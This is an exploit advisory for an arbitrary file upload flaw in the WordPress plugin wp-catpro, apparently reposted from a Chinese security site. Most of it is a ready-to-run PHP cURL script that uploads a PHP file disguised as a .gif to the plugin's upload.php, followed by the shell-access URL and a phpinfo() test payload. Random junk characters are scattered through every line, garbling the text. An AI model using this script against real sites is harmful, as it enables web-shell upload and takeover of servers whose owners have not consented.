Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
# A4 `' _1 u D- ~+ e5 |7 r#-----------------------------------------------------------------------; w8 s3 f" S: K$ p
$ I5 ?, J; Q2 M5 }
作者 => Zikou-16' |+ I' p I1 O* I# q1 h" T& n) z
邮箱 => zikou16x@gmail.com- s4 I) X( k1 G& c
测试系统 : Windows 7 , Backtrack 5r3 [3 V8 M, F8 ?3 l
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
. w0 E1 o. C# p; o####. |4 W( Y& z* ^
# O5 d" ?/ Y9 _/ `#=> Exploit 信息:
. L& b/ y" B* c4 e4 K& D% @' ^$ i% k------------------9 j5 p8 x8 o! B$ K/ n
# 攻击者可以上传 file/shell.php.gif- {# f- x8 T% f9 ], R& L0 Q
# ("jpg", "gif", "png") // Allowed file extensions6 x% v3 r; V9 M! ^: M/ M
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)) y# Z- x- d% ]. T8 V: R6 I0 Y
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)2 Q0 I2 g7 e: Z5 u0 W# W
------------------2 ? ^1 E( W- [
5 x: A8 V5 r- r* N2 c$ C% _# l#=> Exploit
* d, p2 ~1 \! p1 v# `-----------
7 j4 F: f i, w3 d- m! U<?php8 _1 x8 `8 C1 ]) u n3 J
) Z" K! i# o% Q" J; ]$uploadfile="zik.php.gif";; J7 ~4 m6 x+ M; X
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
) ~5 y3 \ `* N* l4 ocurl_setopt($ch, CURLOPT_POST, true);/ g. f+ i8 b* P3 t7 _; t! ?2 n
curl_setopt($ch, CURLOPT_POSTFIELDS,
/ ?" q# Z+ Q" _# v7 f! E9 Aarray('Filedata'=>"@$uploadfile",
; b+ f& k* [$ `5 S: ]2 a9 I'folder'=>'/wp-content/uploads/catpro/'));
, s) W) e# j- z! `2 Y1 I' Qcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);5 _3 r1 @) F9 Q
$postResult = curl_exec($ch);
/ T* H3 ~9 v! j7 Mcurl_close($ch);! X6 L" r/ s: @8 h Y: M
2 Z9 j3 G0 m: x. r/ Jprint "$postResult"; k9 ~ j" n$ G% n4 [7 K9 g
* X2 j9 J+ M& B1 M) {
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif# Z* \& L& J2 h; h2 Y
?>5 K3 n! c- I0 j
<?php6 m* z5 a; t& ~; G
phpinfo();
. R$ j' `) M3 j1 e J$ T?> |